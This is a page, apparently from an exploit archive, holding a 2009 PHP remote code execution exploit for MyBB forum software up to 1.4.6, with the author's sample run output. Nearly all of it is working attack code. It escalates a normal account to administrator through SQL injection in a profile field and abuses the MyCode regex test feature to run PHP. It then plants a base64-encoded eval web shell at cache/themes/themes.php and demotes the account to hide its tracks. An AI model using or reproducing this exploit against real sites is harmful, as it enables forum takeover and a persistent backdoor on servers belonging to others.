Exploit MyBB 1.4.6 - Remote Code Execution


18 Дек 2022
Проверка EDB
  1. Пройдено
Тип уязвимости
Дата публикации

Someone decided to contact mybb's staff informing about this vulnerability with the obvious result that this will not work anymore. 
Fucking moron.

I'm releasing a non-finished version of the exploit. No help, PoC and with the necessity of --admindir flag.
Going to update it in the next days.
For historical reason, i'm leaving the original title, but note that is <= 1.4.6


paradox@d3b14n:~/Files/Exploit-Pocs/My_Exploit/Remote/Mybb$ php myBBtomilw0rm.php -u anybody -p qwerty -t http://localhost/web/mybb/Upload/ --admindir /admin/
[.] Initialing.
[+] Logged in.
[+] my_post_key variable found.
[+] Turned On mybb's invisible mode.
[+] Sql code injected. You're now admin.
[+] Admindir found (or --admindir is used): /admin/.
[+] Admin sid Found: 824e26b4221673a0f213c37f87b9ccd7
[+] Site correctly backdoored.
[+] Sql code injected. You're now user.
[+] Backdoor URI: http://localhost/web/mybb/Upload//cache/themes/themes.php
All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it.
Have a nice day :P

For the curious people: http://mybboard.it/forum/thread-3623.html



Mybb <= 1.4.4 Remote Code Execution through Sql Injection Exploit

Discovered: 	About 4 days before the exploit was coded.
Coded:		03-03-2009 
Author:		The:Paradox
Release:	Not yet. 

No php.ini setting can stop us ! =O 
A user (not email confirmed too) is needed.

Keep private or your keyboard will blew up.


$mybb = new maibibi2;

class maibibi2 

	function __construct ()

		$this->user	= $this->get_argv('-u');
		$this->pass	= $this->get_argv('-p');
		$this->target	= $this->get_argv('-t');
		$this->admindir	= $this->get_argv('--admindir');	
		$this->oa2u	= $this->get_argv('--onlyadmin2user');

		$this->ip	= '';
		$this->ua	= 'Mozilla 5.0';
		$this->bckdr	= '/cache/themes/themes.php';

		if ($this->get_argv('--help') !== False || $this->get_argv('-h') !== False)	$this->help();
		if (!$this->user || !$this->pass)						die ("You have to insert User/Password\r\nUse --help or -h for more informations.\r\n");
		if (!$this->target)								die ("You have to insert Target\r\nUse --help or -h for more informations.\r\n");


	function help ()

		die ("Under Construction\r\n");


	function get_argv ($what)
		global $argv;

		if (!$n = array_search($what, $argv)) return False;
		return $argv[$n+1];	

	function init ()

		set_time_limit(0); // about 30 seconds left? Be serious.

		echo "[.] Initialing.\r\n";

			if (!$this->mybbuser = $this->ilovecookies ()) die ("Incorrect credentials.\r\n");

		echo "[+] Logged in.\r\n";

			if (!$this->mypostkey = $this->getmypostkey())  die ("My_Post_Key Not Found.\r\n");

		echo "[+] my_post_key variable found.\r\n";


		echo "[+] Turned On mybb's invisible mode.\r\n";


		echo "[+] Sql code injected. You're now admin.\r\n";

			if (!$this->admindir && !$this->admindir = $this->findadmindir()) die ("Unable to find admin Dir.\r\nWhatever it's possible your user is currently an administrator.\r\nIf you know admin dir path, you may use --admindir\r\n");

		echo "[+] Admindir found (or --admindir is used): {$this->admindir}.\r\n";		

			if (!$this->adminsid = $this->loginadmin())  die ("[-] Unable to login as admin.\r\nWhatever it's possible your user is currently an administrator.\r\n");
		echo "[+] Admin sid Found: {$this->adminsid}\r\n";		
			$this->rce ();		
			if (!$this->checkrce ()) die ("Unable to Execute PHP Code.\r\nWhatever it's possible your user is currently an administrator.\r\n");

		echo "[+] Site correctly backdoored.\r\n";


		echo "[+] Sql code injected. You're now user.\r\n";
		echo "[+] Backdoor URI: {$this->target}{$this->bckdr}\r\n";
		echo "All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it.\r\nHave a nice day :P\r\n\r\n";


	function ilovecookies ()
		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua);
		$this->postdata = array ('username' => $this->user, 'password' => $this->pass, 'submit' => 'Login', 'action' => 'do_login');
		$rsp = $this->post ("{$this->target}/member.php");
		if (!preg_match_all ('~mybbuser=(.+?);~',$rsp,$res)) return False;

		return $res[1][0];


	function getmypostkey ()

		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/member.php", 'Cookie' => "mybbuser={$this->mybbuser};");
		$rsp = $this->get ("{$this->target}/usercp.php?action=profile");

		if (!preg_match_all ('~name="my_post_key" value="(.+?)" />~',$rsp,$res)) return False;

		return $res[1][0];				


	function hidemefromonlinelist()

		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
		$this->postdata = array ('my_post_key' => $this->mypostkey, 'invisible' => '1', 'action' => 'do_options', 'regsubmit' => 'Update+Options');
		$rsp = $this->post ("{$this->target}/member.php");

	function user2admin ()


		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
		$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
					'invisible'			=> '1', 
					'bday1'				=> '', 
					'bday2'				=> '', 
					'bday3'				=> '', 
					'website'			=> 'http%3A%2F%2F', 
					'profile_fields%5Bfid3%5D'	=> 'Undisclosed', 
					'profile_fields%5Bfid2%5D'	=> 'Undisclosed',
					'profile_fields%5Bfid1%5D'	=> 'Undisclosed', 
					'usertitle'			=> '',
					'icq'				=> '', 
					'aim'				=> '', 
					'msn'				=> '', 
					'yahoo'				=> '', 
					'away'				=> '0', 
					'awayreason'			=> '', 
					'awayday'			=> '', 
					'awaymonth'			=> '',
					'awayyear'			=> '',
					'birthdayprivacy'		=> "all', usergroup=4, email='[email protected]',regip='', longregip='1334595923', lastip='', longlastip='",
					'action'			=> 'do_profile', 
					'regsubmit'			=> '1');

		$rsp = $this->post ("{$this->target}/usercp.php");

	function findadmindir ()

		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
		$rsp = $this->get("{$this->target}/index.php");

		if (!preg_match_all ("~<!-- start: header_welcomeblock_member_admin -->
 &mdash; <a href=\"{$this->target}(.+?)/index.php\">~",$rsp,$res)) return False;

		return $res[1][0];				


	function loginadmin ()

		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
		$this->postdata = array ('username' => $this->user, 'password' => $this->pass, 'do' => 'login');

		$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php");
		if (!preg_match_all ('~adminsid=(.+?);~',$rsp,$res)) return False;

		return $res[1][0];

	function writabledirs ()
		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/{$this->admindir}/index.php?", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};");
		$this->get ("{$this->target}/{$this->admindir}/index.php?module=tools") ;


	function rceOld ()


	//edits inc/functions.php (original one)

	$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};");
	$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
					'o_o'				=> 'phpinfo();', 
					'regex'				=> '(.*%3F)#e%00', 
					'replacement'			=> 'die(eval(stripslashes($_REQUEST[\'o_o\'])));', 
					'test_value'			=> 'XoD');

	$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");


	function rce ()


	$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};");
	$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
					'o_o'				=> 'JGZwID0gZm9wZW4oJF9SRVFVRVNUWydmaWxlJ10sICdhJyk7DQpmd3JpdGUoJGZwLCAnPD9QSFAgaWYgKGlzc2V0KCRfUkVRVUVTVFt4XSkpIGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFt4XSkpOyA/PicpOw0KZmNsb3NlKCRmcCk7', 
					'regex'				=> '(.*%3F)#e%00', 
					'replacement'			=> 'die(eval(base64_decode($_REQUEST[\'o_o\'])));', 
					'test_value'			=> 'XoD',
					'file'				=> "../{$this->bckdr}");

	$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");


	function admin2user ()

		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
		$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
					'invisible'			=> '1', 
					'bday1'				=> '', 
					'bday2'				=> '', 
					'bday3'				=> '', 
					'website'			=> 'http%3A%2F%2F', 
					'profile_fields%5Bfid3%5D'	=> 'Undisclosed', 
					'profile_fields%5Bfid2%5D'	=> 'Undisclosed',
					'profile_fields%5Bfid1%5D'	=> 'Undisclosed', 
					'usertitle'			=> '',
					'icq'				=> '', 
					'aim'				=> '', 
					'msn'				=> '', 
					'yahoo'				=> '', 
					'away'				=> '0', 
					'awayreason'			=> '', 
					'awayday'			=> '', 
					'awaymonth'			=> '',
					'awayyear'			=> '',
					'birthdayprivacy'		=> "all', usergroup=2, email='[email protected]',regip='', longregip='1334595923', lastip='', longlastip='",
					'action'			=> 'do_profile', 
					'regsubmit'			=> '1');

		$rsp = $this->post ("{$this->target}/usercp.php");


	function checkrce_old ()

		$this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;');
		$rsp = $this->get ("{$this->target}/{$this->admindir}/inc/functions.php?");

		if (!strstr($rsp,'.:31337:.'))	return False;
		else				return True;


	function checkrce ()

		$this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;');
		$rsp = $this->get ("{$this->target}/{$this->bckdr}");

		if (!strstr($rsp,'.:31337:.'))	return False;
		else				return True;


	function http ($port = 80, $header = array(), $post = array(), $timeout = 30)

		$this->port	= $port;
		$this->timeout	= $timeout;
		$this->header	= $header;
		$this->postdata	= $post;

	function get ($url)
		$this->url = parse_url($url);
		$this->packet = array();

		$this->packet[] = "GET {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} HTTP/1.1";
		$this->packet[] = "Host: {$this->url['host']}";

		foreach ($this->header as $header => $value)
			$this->packet[] = "$header: $value";
		$this->packet[] = "\r\n\r\n"; 
		$this->packet	= implode ("\r\n",$this->packet);

		return $this->conn();

	function post ($url)
		$this->url = parse_url($url);

		$this->packet = array();
		$this->postcontent = '';

		$this->packet[] = "POST {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} HTTP/1.1";
		$this->packet[] = "Host: {$this->url['host']}";

		foreach ($this->header as $header => $value)
			$this->packet[] = "$header: $value";
		foreach ($this->postdata as $post => $value)
			if ($this->postcontent != '') $this->postcontent .= '&'; 
			$this->postcontent .= "$post=$value";
		$this->packet[] = 'Content-Type: application/x-www-form-urlencoded';
		$this->packet[] = "Content-Length: ".strlen($this->postcontent)."\r\n";
		$this->packet[] = $this->postcontent;

		$this->packet	= implode ("\r\n",$this->packet);

		return $this->conn();

	function conn()
		if (!isset($this->url['port']))	$this->url['port'] = $this->port;

		$sk = fsockopen ($this->url['host'], $this->url['port'], $eno, $estr, $this->timeout);

		if (!is_resource($sk))	return "[-] Fsockopen Failed! Error: ".$estr." [".$eno."]" ;

		else	{

    				fputs($sk, $this->packet);
				$rsp = "";
				while (!feof($sk)) 
	       					$rsp .= fgets ($sk, 1024);

		return $rsp;



# milw0rm.com [2009-06-22]

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